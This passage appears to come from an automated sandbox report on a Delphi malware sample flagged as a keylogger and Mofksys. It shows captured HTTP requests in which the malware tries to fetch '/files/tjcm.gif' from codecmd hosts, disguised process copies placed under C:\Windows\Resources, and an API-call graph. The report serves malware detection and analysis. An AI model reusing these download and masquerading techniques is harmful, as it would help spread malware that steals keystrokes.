                                                                                                      Sep 30, 2024 16:16:52.661364079 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:52 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:52.661390066 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      148192.168.2.549862108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:53.048182011 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:53.731483936 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:53 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:53.731501102 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      149192.168.2.549863108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:54.152106047 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:54.821732044 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:54 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:54.822058916 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:10:13:08
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'640 bytes
                                                                                                      MD5 hash:35D43833C8E14F030D4EA74EDA1B8DD5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2059845376.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:10:13:10
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'811 bytes
                                                                                                      MD5 hash:8C38488BD8A8FFF2A635B644BEB61C1E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2084070518.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:3
                                                                                                      Start time:10:13:12
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\spoolsv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'642 bytes
                                                                                                      MD5 hash:6375F300DFDCF48B2502987709E35C1C
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000003.2095587943.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:10:13:13
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\resources\svchost.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'786 bytes
                                                                                                      MD5 hash:789AC0C78808EADDAABA13B1F71F4947
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:5
                                                                                                      Start time:10:13:15
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\spoolsv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'642 bytes
                                                                                                      MD5 hash:6375F300DFDCF48B2502987709E35C1C
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000002.2170519310.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:10:13:28
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'811 bytes
                                                                                                      MD5 hash:8C38488BD8A8FFF2A635B644BEB61C1E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:10:13:29
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:10:13:30
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'811 bytes
                                                                                                      MD5 hash:8C38488BD8A8FFF2A635B644BEB61C1E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000A.00000002.2309973257.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:10:13:36
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'786 bytes
                                                                                                      MD5 hash:789AC0C78808EADDAABA13B1F71F4947
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:10:13:36
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\System32\consent.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:consent.exe 5152 322 0000013E5E228840
                                                                                                      Imagebase:0x7ff739f80000
                                                                                                      File size:186'704 bytes
                                                                                                      MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:10:13:38
                                                                                                      Start date:30/09/2024
                                                                                                      Path:C:\Windows\Resources\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                      Imagebase:0x400000
                                                                                                      File size:759'786 bytes
                                                                                                      MD5 hash:789AC0C78808EADDAABA13B1F71F4947
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000D.00000002.2381560124.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.2354977756.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2383521769.0000000000539000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:11.9%
                                                                                                        Total number of Nodes:219
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 24553 4e741c 24564 4e7424 24553->24564 24554 4e77c8 24646 4254d0 11 API calls 24554->24646 24556 4e77e5 24647 425be0 SysFreeString 24556->24647 24558 4e75ba 24607 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24558->24607 24559 4e77f5 24648 425be0 SysFreeString 24559->24648 24562 4e75c7 24608 471e9c 32 API calls 24562->24608 24563 4e7802 24649 426c24 13 API calls 24563->24649 24564->24554 24566 4e74bd 24564->24566 24576 4e7561 24564->24576 24636 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24566->24636 24568 4e75d5 24609 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24568->24609 24570 4e7810 24572 4e74ca 24637 471e9c 32 API calls 24572->24637 24573 4e75e2 24610 471e9c 32 API calls 24573->24610 24576->24558 24583 4e75a1 FindWindowW 24576->24583 24577 4e74d8 24579 4cf5c8 18 API calls 24577->24579 24578 4e75f0 24611 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24578->24611 24581 4e74e4 24579->24581 24581->24554 24584 4cf628 18 API calls 24581->24584 24582 4e75fe 24612 471e9c 32 API calls 24582->24612 24583->24554 24586 4e75b3 24583->24586 24596 4e7506 24584->24596 24586->24554 24587 4e760c 24613 4cf5c8 24587->24613 24588 4e7556 CloseHandle 24588->24554 24591 4e7618 24592 4e76c8 EnumWindows 24591->24592 24618 4cf628 24591->24618 24605 4e76de 24592->24605 24595 4e76c2 CloseHandle 24595->24592 24596->24588 24597 4e7541 24596->24597 24638 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24596->24638 24639 471e9c 32 API calls 24596->24639 24640 4cf648 24596->24640 24597->24588 24603 4e763a 24603->24595 24604 4cf648 18 API calls 24603->24604 24623 426c18 28 API calls 24603->24623 24624 425b98 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 24603->24624 24625 471e9c 32 API calls 24603->24625 24626 425c04 24603->24626 24604->24603 24605->24554 24645 4e02c8 54 API calls 24605->24645 24607->24562 24608->24568 24609->24573 24610->24578 24611->24582 24612->24587 24650 4cf34c 24613->24650 24616 4cf5d7 CreateToolhelp32Snapshot 24616->24591 24617 4cf5e2 24617->24591 24619 4cf34c 17 API calls 24618->24619 24620 4cf633 24619->24620 24621 4cf637 Process32FirstW 24620->24621 24622 4cf642 24620->24622 24621->24603 24622->24603 24623->24603 24624->24603 24625->24603 24627 425bc8 24626->24627 24628 425c0c 24626->24628 24630 425bce SysFreeString 24627->24630 24631 425bdc 24627->24631 24628->24627 24629 425c17 SysReAllocStringLen 24628->24629 24632 425c27 24629->24632 24633 425b98 24629->24633 24630->24631 24631->24603 24632->24603 24634 4261f4 24633->24634 24635 4261de SysAllocStringLen 24633->24635 24634->24603 24635->24633 24635->24634 24636->24572 24637->24577 24638->24596 24639->24596 24641 4cf34c 17 API calls 24640->24641 24642 4cf653 24641->24642 24643 4cf657 Process32NextW 24642->24643 24644 4cf662 24642->24644 24643->24596 24644->24596 24645->24605 24646->24556 24647->24559 24648->24563 24649->24570 24651 4cf35b GetModuleHandleA 24650->24651 24652 4cf490 24650->24652 24651->24652 24653 4cf370 16 API calls 24651->24653 24652->24616 24652->24617 24653->24652 24654 564640 24655 56464d VirtualAlloc 24654->24655 24657 6d8a4b 24659 6d8a50 24657->24659 24662 564678 24659->24662 24667 564685 24662->24667 24663 564812 24664 5646f6 02D63A27 02D63A0C 24665 564735 24664->24665 24666 564718 02D63A27 24665->24666 24669 564793 24665->24669 24670 564752 02D63A0C 24665->24670 24671 564761 02D63A0C 24665->24671 24666->24665 24668 564727 02D63983 24666->24668 24667->24663 24667->24664 24668->24665 24673 4250a4 24669->24673 24670->24665 24671->24665 24674 4250ea 24673->24674 24675 425163 24674->24675 24676 425310 24674->24676 24687 425034 24675->24687 24679 425344 24676->24679 24680 425355 24676->24680 24693 425284 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24679->24693 24683 42539a FreeLibrary 24680->24683 24684 4253be 24680->24684 24682 42534e 24682->24680 24683->24680 24685 4253c7 24684->24685 24686 4253cd ExitProcess 24684->24686 24685->24686 24688 425049 24687->24688 24689 42507f 24687->24689 24688->24689 24694 423a80 24688->24694 24700 426cc4 24688->24700 24704 427860 24688->24704 24689->24663 24693->24682 24695 423aa0 24694->24695 24696 423a88 24694->24696 24695->24688 24710 42342c 24696->24710 24697 423a90 24697->24695 24721 423bb4 11 API calls 24697->24721 24701 426cd4 GetModuleFileNameA 24700->24701 24702 426cf0 24700->24702 24786 426f58 GetModuleFileNameA RegOpenKeyExA 24701->24786 24702->24688 24705 427871 24704->24705 24706 4278a2 24704->24706 24705->24706 24805 426d0c 24705->24805 24706->24688 24711 423443 24710->24711 24712 42343e 24710->24712 24714 423470 RtlEnterCriticalSection 24711->24714 24715 42347a 24711->24715 24718 42344f 24711->24718 24722 422bd0 RtlInitializeCriticalSection 24712->24722 24714->24715 24715->24718 24729 4232e4 24715->24729 24718->24697 24719 4235c7 24719->24697 24720 4235bd RtlLeaveCriticalSection 24720->24719 24721->24695 24723 422bf5 RtlEnterCriticalSection 24722->24723 24724 422bff 24722->24724 24723->24724 24725 422c1d LocalAlloc 24724->24725 24726 422c37 24725->24726 24727 422c97 24726->24727 24728 422c8d RtlLeaveCriticalSection 24726->24728 24727->24711 24728->24727 24733 4232fb 24729->24733 24730 42333c 24734 423363 24730->24734 24740 42307c 24730->24740 24733->24730 24733->24734 24735 42324c 24733->24735 24734->24719 24734->24720 24744 422950 24735->24744 24737 42325c 24738 423269 24737->24738 24751 4231c0 9 API calls 24737->24751 24738->24733 24741 423117 24740->24741 24742 4230a1 24740->24742 24741->24742 24760 422fc0 24741->24760 24742->24734 24746 42296e 24744->24746 24748 42297c 24746->24748 24749 4229dc 24746->24749 24752 422630 24746->24752 24758 4224e4 LocalAlloc 24746->24758 24748->24737 24759 42270c VirtualFree 24749->24759 24751->24738 24753 42263f 24752->24753 24754 42268f 24753->24754 24755 422454 LocalAlloc 24753->24755 24754->24746 24756 422678 24755->24756 24756->24754 24757 42267c VirtualFree 24756->24757 24757->24754 24758->24746 24759->24748 24762 422fd4 24760->24762 24761 423070 24761->24742 24762->24761 24763 423022 24762->24763 24764 42300c 24762->24764 24765 422b3c 3 API calls 24763->24765 24773 422b3c 24764->24773 24767 423020 24765->24767 24767->24761 24783 422e80 9 API calls 24767->24783 24769 423043 24770 423065 24769->24770 24784 422ee0 9 API calls 24769->24784 24785 42256c LocalAlloc 24770->24785 24774 422b66 24773->24774 24782 422bc3 24773->24782 24775 422894 VirtualFree 24774->24775 24776 422b77 24775->24776 24777 4224e4 LocalAlloc 24776->24777 24778 422b87 24777->24778 24779 422b9e 24778->24779 24780 42270c VirtualFree 24778->24780 24781 42256c LocalAlloc 24779->24781 24779->24782 24780->24779 24781->24782 24782->24767 24783->24769 24784->24770 24785->24761 24787 426fda 24786->24787 24788 426f9a RegOpenKeyExA 24786->24788 24804 426d80 12 API calls 24787->24804 24788->24787 24789 426fb8 RegOpenKeyExA 24788->24789 24789->24787 24791 